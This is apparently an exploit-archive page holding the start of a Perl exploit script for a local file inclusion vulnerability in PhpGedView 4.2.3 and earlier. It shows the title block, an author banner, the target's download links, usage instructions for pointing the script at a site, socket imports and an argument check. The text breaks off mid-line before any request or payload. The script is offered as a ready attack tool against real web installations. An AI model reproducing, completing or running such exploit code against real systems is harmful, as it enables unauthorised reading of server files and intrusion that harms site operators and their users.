[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PhpGedView <= 4.2.3 Local File Inclusion Vulnerability
# Published : 2011-01-05
# Author : dun
# Previous Title : ChurchInfo <= 1.2.12 SQL Injection Vulnerability
# Next Title : Siteframe 3.2.3 (user.php) SQL Injection Vulnerability
#!/usr/bin/perl -w
# :::::::-. ... ::::::. :::.
# ;;, `';, ;; ;;;`;;;;, `;;;
# `[[ [[[[' [[[ [[[[[. '[[
# $$, $$$$ $$$ $$$ "Y$c$$
# 888_,o8P'88 .d888 888 Y88
# MMMMP"` "YmmMMMM"" MMM YM
# [ Discovered by dun posdub[at]gmail.com ]
#
##################################################################
# [ PhpGedView <= 4.2.3 ] Local File Inclusion Vulnerability #
##################################################################
#
# Script: "PhpGedView is a revolutionary genealogy program which
# allows you to view and edit your genealogy on your website..."
#
# Script: http://www.phpgedview.net/
# Download: http://sourceforge.net/projects/phpgedview/
#
# Usage: perl expl.pl http://site.com/phpgedview/
#
##################################################################
#[ dun / 2011-01-05 ]
use IO::Socket;
use Socket;
use IO::Select;
my @modules;
if(scalar(@ARGV) < 1) {
print "nUsage: perl expl.pl http://site.com/phpgedview/nn";
exit;
}
print "